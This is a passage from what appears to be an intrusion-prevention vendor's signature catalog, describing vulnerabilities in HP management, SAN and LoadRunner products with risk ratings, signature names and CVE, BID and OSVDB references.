There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the SyslogDownloadServlet servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.

Situation:

HTTP_CSU-HP-IMC-Syslogdownloadservlet-Information-Disclosure

References:

CVE-2012-5206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5206

BID-58385
http://www.securityfocus.com/bid/58385

OSVDB-91031
http://www.osvdb.org/91031

HP-Intelligent-Management-Center-Uam-Acmservletdownload-Information-Disclosure

About this vulnerability:

A vulnerability in HP Intelligent Management Center User Access Manager

Risk:

Moderate

First detected in:

sgpkg-ips-524-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center UAM

Type:

Directory Traversal

Description:

There is an information disclosure vulnerability in the UAM add-in module of HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the acmServletDownload servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.

Situation:

Generic_UDP-HP-Intelligent-Management-Center-Uam.exe-Stack-Buffer-Overflow

References:

CVE-2012-5211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5211

BID-58385
http://www.securityfocus.com/bid/58385

OSVDB-91036
http://www.osvdb.org/91036

HP-Intelligent-Management-Center-Uam.exe-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Intelligent Management Center UAM

Risk:

High

First detected in:

sgpkg-ips-475-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center UAM

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in HP Intelligent Management Center's uam.exe service which listens on port UDP/1811. The vulnerability is due to lack of validation of a string passed to sprintf() when writing to a log file. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the vulnerable service. Successful exploitation could result in arbitrary code execution in the context of the affected service, which is SYSTEM.

Situation:

References:

BID-55271
http://www.securityfocus.com/bid/55271

OSVDB-85060
http://www.osvdb.org/85060

HP-Lefthand-Virtual-SAN-Appliance-Hydra-Credential-Information-Disclosure

About this vulnerability:

A vulnerability in HP LeftHand Virtual SAN Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LeftHand Virtual SAN Appliance

Type:

Malfunction

Description:

There is an information disclosure vulnerability in HP LeftHand Virtual SAN Appliance. The vulnerability is due to a design weakness in the hydra component which listens by default on 13841/tcp. A remote unauthenticated attacker can exploit this vulnerability by sending snapshot requests to the server and reveal the credentials of any existing users on the server. The attacker can also exploit the vulnerability by sniffing the normal traffic communicated between the CMC and the server. Successful exploitation will disclose credentials that could allow the attacker to log in to the server with administrator privileges.

Situation:

Generic_CS-HP-Lefthand-Virtual-SAN-Hydra-Credential-Information-Disclosure

References:

CVE-2012-3282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3282

OSVDB-89918
http://www.osvdb.org/89918

HP-Lefthand-Virtual-SAN-Appliance-Hydra-Diag-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in HP LeftHand Virtual SAN Appliance

Risk:

High

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LeftHand Virtual SAN Appliance

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in HP LeftHand Virtual SAN Appliance. The vulnerability is due to insufficient input validation on parameters of a Diag request sent to the hydra service which listens by default on port 13838/TCP. A remote attacker can exploit this vulnerability by authenticating to the server and then sending crafted Diag requests. Successful exploitation of these vulnerabilities would lead to code execution in the security context of the affected service which is root. If the attack fails, the application may terminate abnormally.

Situation:

Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Diag-Processing-BOF

References:

CVE-2012-3283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3283

OSVDB-89917
http://www.osvdb.org/89917

HP-Lefthand-Virtual-SAN-Appliance-Hydra-Login-Code-Execution

About this vulnerability:

A vulnerability in HP LeftHand Virtual SAN Appliance

Risk:

High

First detected in:

sgpkg-ips-562-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LeftHand Virtual SAN Appliance

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in HP LeftHand Virtual SAN Appliance. An attacker can exploit this issue to execute arbitrary code in the context of the affected device. Failed exploit attempts will likely result in denial-of-service conditions.

Situation:

Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Login-Code-Execution

References:

CVE-2013-2343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2343

BID-60884
http://www.securityfocus.com/bid/60884

HP-Lefthand-Virtual-SAN-Appliance-Hydra-Ping-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in HP LeftHand Virtual SAN Appliance

Risk:

High

First detected in:

sgpkg-ips-514-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LeftHand Virtual SAN Appliance

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in HP LeftHand Virtual SAN Appliance. The vulnerability is due to insufficient input validation on target hostname or IP address of a Ping request sent to the hydra service which listens by default on port 13838/TCP. A remote attacker can exploit this vulnerability by authenticating to the server and then sending crafted Ping requests. Successful exploitation of these vulnerabilities would lead to code execution in the security context of the affected service which is root. If the attack fails, the application may terminate abnormally.

Situation:

Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-Ping-Processing-BOF

References:

CVE-2012-3285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3285

OSVDB-89919
http://www.osvdb.org/89919

HP-Lefthand-Virtual-SAN-Appliance-Hydra-SNMP-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in HP LeftHand Virtual SAN Appliance

Risk:

High

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LeftHand Virtual SAN Appliance

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in HP LeftHand Virtual SAN Appliance. The vulnerability is due to insufficient input validation on parameters of an SNMP request sent to the hydra service which listens by default on port 13838/TCP. A remote attacker can exploit this vulnerability by sending a crafted SNMP request. Successful exploitation of this vulnerability would lead to code execution in the security context of the affected service which is root. If the attack fails, the application may terminate abnormally.

Situation:

Generic_CS-HP-Lefthand-Virtual-SAN-Appliance-Hydra-SNMP-Processing-BOF

References:

CVE-2012-3284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3284

OSVDB-89920
http://www.osvdb.org/89920

HP-Linux-Imaging-And-Printing-Project-Command-Execution

About this vulnerability:

An HP Linux Imaging And Printing Project Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

HP Linux Imaging And Printing Project

Type:

Input Validation

Description:

A vulnerability in HP Linux Imaging And Printing Project, versions 1.x and 2.x before 2.7.10, which allows remote attackers to execute arbitrary commands via shell metacharacters in the from address parameter.

Situation:

Generic_CS-HP-Linux-Imaging-And-Printing-Project-Command-Execution

References:

CVE-2007-5208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5208

BID-26054
http://www.securityfocus.com/bid/26054

OSVDB-41693
http://www.osvdb.org/41693

HP-Load-Runner-Directory-Traversal

About this vulnerability:

An HP Load Runner Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Input Validation

Description:

A vulnerability in Persists XUpload ActiveX control in HP Load Runner, version 9.5, which allows remote attackers to create arbitrary files via a directory traversal in the third argument to the MakeHttpRequest method.

Situation:

File-Text_HP-Load-Runner-Directory-Traversal

References:

CVE-2009-3693
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3693

OSVDB-60001
http://www.osvdb.org/60001

HP-LoadRunner-And-Performance-Center-Libxdrutil-Mxdr_String-Heap-BOF

About this vulnerability:

A vulnerability in HP LoadRunner

Risk:

Moderate

First detected in:

sgpkg-ips-880-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

Insufficient length validation causes a heap buffer overflow in HPE LoadRunner. A successful exploitation allows a remote attacker to run arbitrary code on the target system with system-level privileges.

Situation:

Generic_CS-HP-LoadRunner-And-Performance-Center-Libxdrutil-Mxdr_String-Heap-Buffer-Overflow

References:

CVE-2017-5789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5789

HP-LoadRunner-Buffer-Overflow

About this vulnerability:

An HP LoadRunner Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-760-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in HP LoadRunner, versions before 11.52, in the Agent Process magentproc.exe, which allows remote attackers to execute arbitrary code.

Situation:

HTTP_CS-HP-LoadRunner-Buffer-Overflow

References:

CVE-2013-4800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4800

OSVDB-95644
http://www.osvdb.org/95644

HP-LoadRunner-Controller-Scenario-File-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP LoadRunner

Risk:

Moderate

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

A vulnerability in HP LoadRunner Controller can be exploited by sending a crafted scenario file, which causes a stack buffer overflow. This can allow an attacker to run arbitrary code on the target.

Situation:

File-Text_HP-LoadRunner-Controller-Scenario-File-Stack-Buffer-Overflow

References:

CVE-2015-5426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5426

HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP LoadRunner

Risk:

High

First detected in:

sgpkg-ips-649-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in HP LoadRunner. The vulnerability is due to insufficient validation of a length value in SSL communication with the HP LoadRunner. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable version of the software. Successful exploitation could result in execution of arbitrary code within the security context of SYSTEM. Unsuccessful attempts can cause a denial-of-service condition.

Situation:

HTTPS_CS-HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow
Generic_CS-HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow

References:

CVE-2015-2110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2110

BID-74737
http://www.securityfocus.com/bid/74737

HP-LoadRunner-Lrfileioservice-ActiveX-Control-Input-Validation-Error

About this vulnerability:

A vulnerability in HP LoadRunner

Risk:

Moderate

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Input Validation

Description:

There is an input validation error in HP LoadRunner. The vulnerability is due to insufficient input validation of the WriteFileBinary() function parameters in the lrFileIOService ActiveX Control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.

Situation:

File-Text_HP-LoadRunner-Lrfileioservice-ActiveX-Input-Validation-Error

References:

CVE-2013-2370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2370

BID-61441
http://www.securityfocus.com/bid/61441

OSVDB-95640
http://www.osvdb.org/95640

HP-LoadRunner-Micwebajax-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP LoadRunner

Risk:

Moderate

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

An stack buffer overflow vulnerability exists in HP LoadRunner. The vulnerability is due to insufficient bounds checking on NotifyEvent method parameters. The application copies the parameters into a fixed size stack buffer, which can be overflowed. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution within security context of the target user.

Situation:

File-Text_HP-LoadRunner-Micwebajax-ActiveX-Control-Stack-Buffer-Overflow

References:

CVE-2013-2368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2368

OSVDB-95639
http://www.osvdb.org/95639

HP-LoadRunner-Virtual-User-Generator-Emulationadmin-Two-Directory-Traversal

About this vulnerability:

A vulnerability in HP Virtual User Generator

Risk:

Moderate

First detected in:

sgpkg-ips-562-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Directory Traversal

Description:

There are two directory traversal vulnerabilities in HP LoadRunner Virtual User Generator. The vulnerabilities exist in the EmulationAdmin web service. The vulnerabilities are due to insufficient validation on the parameters of copyFileToServer and getFileContentAsLines methods. A remote unauthenticated attacker can exploit these vulnerabilities to create arbitrary files on the server or disclose sensitive information by reading arbitrary files on the server. Successful exploitation of one of these vulnerabilities could lead to arbitrary code execution on the target system.

Situation:

HTTP_CS-HP-LoadRunner-Virtual-User-Generator-Emulationadmin-Two-Directory-Traversal

References:

CVE-2013-4837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4837

OSVDB-99231
http://www.osvdb.org/99231

HP-LoadRunner-Virtual-User-Generator-Savecoderulefile-Directory-Traversal

About this vulnerability:

A vulnerability in HP Virtual User Generator

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in HP LoadRunner Virtual User Generator. The vulnerability exists in the EmulationAdmin web service. The vulnerability is due to insufficient validation on the parameters of saveCodeRuleFile method sent via SOAP requests. A remote unauthenticated attacker can exploit this vulnerability to create arbitrary files on the server. Successful exploitation of the vulnerability could lead to arbitrary code execution on the target system.

Situation:

HTTP_CS-HP-LoadRunner-Virtual-User-Generator-Savecoderulefile-Directory-Traversal

References:

CVE-2013-4838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4838

BID-63476
http://www.securityfocus.com/bid/63476

OSVDB-99232
http://www.osvdb.org/99232

HP-LoadRunner-Writefilestring-Directory-Traversal

About this vulnerability:

A vulnerability in HP LoadRunner

Risk:

Moderate

First detected in:

sgpkg-ips-541-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Directory Traversal

Description:

There is a directory traversal and file overwrite vulnerability in HP LoadRunner. The vulnerability is caused by the WriteFileString() method which fails to validate the filename parameter. This allows the creation of new files and overwriting of system files, possibly resulting in code execution. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.

Situation:

File-Text_HP-LoadRunner-Writefilestring-Directory-Traversal

References:

CVE-2013-4798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4798

BID-61443
http://www.securityfocus.com/bid/61443

OSVDB-95642
http://www.osvdb.org/95642

HP-LoadRunner-Xdr-Data-Handling-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in HP LoadRunner

Risk:

Moderate

First detected in:

sgpkg-ips-543-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in HP LoadRunner. The vulnerability is due to insufficient validation of the length of XDR encoded data. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable version of the software. Successful exploitation could result in execution of arbitrary code within the context of SYSTEM. Unsuccessful attempts can cause a denial-of-service condition.

Situation:

Generic_CS-HP-LoadRunner-Xdr-Data-Handling-Heap-Buffer-Overflow

References:

CVE-2013-4799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4799

BID-61442
http://www.securityfocus.com/bid/61442

OSVDB-95643
http://www.osvdb.org/95643

HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download

About this vulnerability:	A vulnerability in HP LoadRunner
Risk:	Moderate
First detected in:	sgpkg-ips-253-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	HP LoadRunner
Type:	Code Injection
Description:	There is a code injection vulnerability in HP LoadRunner. The vulnerability is due to an error in the Persits.XUpload ActiveX control which can permit the download of files to arbitrary locations on the victim's computer. After successfully exploiting this vulnerability, a file on the target file system could be created, or overwritten. An attacker may write a file to the start up folder in order to execute arbitrary code during the next reboot or logon session or overwrite credential files on the system in order to gain access to the system.
Situation:	HTTP_SS-HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download File-Text_HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download

HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in HP LoadRunner

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP LoadRunner. The vulnerability is due to an error in the ActiveX control. A particular method has insufficient input validation. An exploitation may lead to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow
File-Text_HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-6530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6530

BID-27025
http://www.securityfocus.com/bid/27025

OSVDB-39901
http://www.osvdb.org/39901

HP-Managed-Printing-Administration-Remote-Command-Execution

About this vulnerability:

An HP Managed Printing Administration Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-785-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Managed Printing Administration

Type:

Input Validation

Description:

A vulnerability in HP Managed Printing Administration, versions before 2.6.4, which allows remote attackers to create arbitrary files via a directory traversal in the MPAUploader.Uploader.1.UploadFiles method.

Situation:

HTTP_CSH-HP-Managed-Printing-Administration-Remote-Command-Execution

References:

CVE-2011-4166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4166

BID-51174
http://www.securityfocus.com/bid/51174

OSVDB-78015
http://www.osvdb.org/78015

HP-Mercury-LoadRunner-Agent-Commandline-Message-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in HP Mercury LoadRunner Agent

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Mercury LoadRunner

Type:

Buffer Overflow

Description:

HHewlett-Packard Mercury LoadRunner Agent and Performance Center Agent version 8.0 and 8.1, and Monitor over Firewall version 8.1 suffer from a buffer overflow vulnerability where a string from a proprietary communication protocol is copied into a fixed size buffer without length checks. The vulnerability can be used by remote attackers to execute arbitrary commands on a vulnerable host.

Situation:

Generic_CS-HP-Mercury-LoadRunner-Agent-Commandline-Message-Buffer-Overflow

References:

CVE-2007-0446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0446

BID-22487
http://www.securityfocus.com/bid/22487

OSVDB-33132
http://www.osvdb.org/33132

HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Mercury Quality Control

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Mercury Quality Control

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP Mercury Quality Control. The vulnerability is due to an error in the TestDirector ActiveX control. A particular method suffers insufficient input validation. An exploitation may lead to arbitrary code exectution in the context of the current user.

Situation:

HTTP_SS-HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow
File-Text_HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-1819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1819

BID-23239
http://www.securityfocus.com/bid/23239

OSVDB-34317
http://www.osvdb.org/34317

HP-Network-Node-Manager-I-Multiple-Cross-Site-Scripting-Vulnerabilities

About this vulnerability:

A vulnerability in HP Network Node Manager i (NNMi)

Risk:

Moderate

First detected in:

sgpkg-ips-427-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Network Node Manager i

Type:

Input Validation

Description:

There are multiple vulnerabilities in HP Network Node Manager i (NNMi). These vulnerabilities are due to input sanitation errors during GET and POST requests. A remote, unauthenticated attacker can exploit any of these vulnerabilities to execute arbitrary script code in a target user's browser within the context of the affected site. An authenticated target user must be enticed to follow a malicious URI or open a crafted page. This could allow stealing authentication cookies and other private data.

Situation:

HTTP_CRL-HP-Network-Node-Manager-I-Multiple-Cross-Site-Scripting-Vulnerabilities

References:

CVE-2011-4155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4155

BID-50635
http://www.securityfocus.com/bid/50635

OSVDB-76962
http://www.osvdb.org/76962

OSVDB-76963
http://www.osvdb.org/76963

HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Network Node Manager i (NNMi)

Risk:

High

First detected in:

sgpkg-ips-607-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Network Node Manager i

Type:

Buffer Overflow

Description:

Multiple buffer overflow vulnerabilities exist in HP Network Node Manager I (NNMi). These vulnerabilities are caused by copying user supplied data into stack-based buffers without sufficient validation in ovopi.dll. By sending a crafted request to the vulnerable product on port 696/UDP, a remote unauthenticated attacker could exploit these vulnerabilities to execute arbitrary code with System privileges.

Situation:

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-T-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-D-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-P-Buffer-Overflow

References:

CVE-2014-2624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2624

OSVDB-111292
http://www.osvdb.org/111292

HP-Network-Node-Manager-I-Ovopi.dll-Command-685-Memory-Corruption

About this vulnerability:

A vulnerability in HP Network Node Manager i (NNMi)

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Network Node Manager i

Type:

Buffer Overflow

Description:

A memory corruption vulnerability exists in HP Network Node Manager I (NNMi). The vulnerability is caused by using remotely supplied data as a pointer without sufficient validation in ovopi.dll. By sending a crafted request to the vulnerable product on port 696/UDP, a remote unauthenticated attacker could possibly exploit this vulnerability to execute arbitrary code with System privileges.

Situation:

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-Vulnerable-Command-Usage

References:

CVE-2014-2624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2624

OSVDB-112522
http://www.osvdb.org/112522

HP-Network-Node-Manager-I-Ovopi.dll-L-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Network Node Manager i (NNMi)

Risk:

Moderate

First detected in:

sgpkg-ips-614-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Network Node Manager i

Type:

Buffer Overflow

Description:

Two buffer overflow vulnerabilities exist in HP Network Node Manager I (NNMi). These vulnerabilities are caused by copying user supplied data into fixed-size buffers without sufficient validation in ovopi.dll. By sending a crafted request to the vulnerable product on port 696/UDP, a remote unauthenticated attacker could exploit these vulnerabilities to execute arbitrary code with System privileges.

Situation:

Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-L-Buffer-Overflow

References:

CVE-2014-2624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2624

OSVDB-112516
http://www.osvdb.org/112516

HP-Network-Virtualization-Storedntxfile-Directory-Traversal

About this vulnerability:

A vulnerability in HP Network Virtualization

Risk:

Moderate

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Network Virtualization

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in HP Network Virtualization software. The vulnerability is due to insufficient input validation of user parameters passed to "storedNtxFile" method. A remote, unauthenticated attacker can leverage this vulnerability to gain access to sensitive information on the vulnerable system by sending malicious GET requests to the server.

Situation:

HTTP_CSU-HP-Network-Virtualization-Storedntxfile-Directory-Traversal

References:

CVE-2014-2625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2625

BID-68849
http://www.securityfocus.com/bid/68849

OSVDB-109473
http://www.osvdb.org/109473

HP-Network-Virtualization-toServerObject-Directory-Traversal

About this vulnerability:

A vulnerability in HP Network Virtualization

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

HP Network Virtualization

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in HP Network Virtualization software. The vulnerability is due to insufficient input validation of user parameters passed to "toServerObject" method. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the vulnerable service. In the event of a successful attack, arbitrary files can be created on the server leading to arbitrary code execution with SYSTEM privileges.

Situation:

HTTP_CSU-HP-Network-Virtualization-toServerObject-Directory-Traversal

References:

CVE-2014-2626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2626

BID-68851
http://www.securityfocus.com/bid/68851

OSVDB-109474
http://www.osvdb.org/109474

HP-OpenView-Application-Recovery-Manager-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Application Recovery Manager

Risk:

High

First detected in:

sgpkg-ips-274-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP OpenView Application Recovery Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability exists in HP OpenView Application Recovery Manager. The vulnerability is due to a boundary error when processing requests sent to the OmniInet process. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted MSG_PROTOCOL (0x010b) request to the target server, potentially causing arbitrary code injection and execution in the security context of the System user.

Situation:

Generic_CS-HP-OpenView-Application-Recovery-Manager-Buffer-Overflow

References:

CVE-2009-3844
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3844

BID-37250
http://www.securityfocus.com/bid/37250

HP-OpenView-Client-Configuration-Manager-Radia-Notify-Daemon-Code-Execution

About this vulnerability:

A vulnerability in HP OpenView Client Configuration Manager

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView

Type:

Malfunction

Description:

There is an authentication weakness vulnerability in the Radia Notify Daemon component of HP OpenView Client Configuration Manager. The flaw is created by improper handling of user supplied data passed to the affected Radia Notify Daemon on TCP port 3465. By sending a crafted message, the attacker can execute commands within the security context of the of the Radia Notify Daemon, which is System by default. Upon a successful attack, the behaviour of the target host is entirely dependent on the intended function of the supplied executable file within the radexecd.exe install directory. The file in such a case would execute within the security context of the Radia Notify Daemon, which is System by default.

Situation:

Generic_CS-HP-OpenView-Client-Configuration-Manager-Code-Execution

References:

CVE-2006-5782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5782

HP-OpenView-Network-Node-Manager-Command-Execution

About this vulnerability:

Command execution vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-37-1210

Last changed:

sgpkg-ips-1782-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Input Validation

Description:

HP OpenView Network Node Manager doesn't properly validate user supplied data that is given to scripts connectedNodes.ovpl, cdpView.ovpl, freeIPaddrs.ovpl, ecscmg.ovpl. Remote attacker is able to exploit this vulnerability to execute arbitrary commands on the victim server.

Situation:

HTTP_CSU-HP-OpenView-Network-Node-Manager-Command-Execution

References:

CVE-2005-1434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1434

BID-14662
http://www.securityfocus.com/bid/14662

HP-OpenView-Network-Node-Manager-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-268-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Malfunction

Description:

There is a denial of service vulnerability in HP OpenView Network Node Manager. A remote attacker can exploit this vulnerability by sending a malicious request to the affected server to cause a denial of service condition.

Situation:

Generic_CS-HP-OpenView-Network-Node-Manager-Denial-Of-Service-Exploit

References:

CVE-2009-3840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3840

BID-37046
http://www.securityfocus.com/bid/37046

OSVDB-60200
http://www.osvdb.org/60200

HP-OpenView-Network-Node-Manager-execvp_nc-BOF

About this vulnerability:

An HP OpenView Network Node Manager execvp_nc BOF vulnerability

Risk:

High

First detected in:

sgpkg-ips-786-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in HP OpenView Network Node Manager, version 7.53 prior to NNM_01206, in in the execvp_nc function of the ov.dll module, which allows remote attackers to execute arbitrary code via a long 'sel' parameter.

Situation:

HTTP_CRL-HP-OpenView-Network-Node-Manager-netmon.exe-BOF

References:

CVE-2010-2703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2703

BID-41829
http://www.securityfocus.com/bid/41829

OSVDB-66514
http://www.osvdb.org/66514

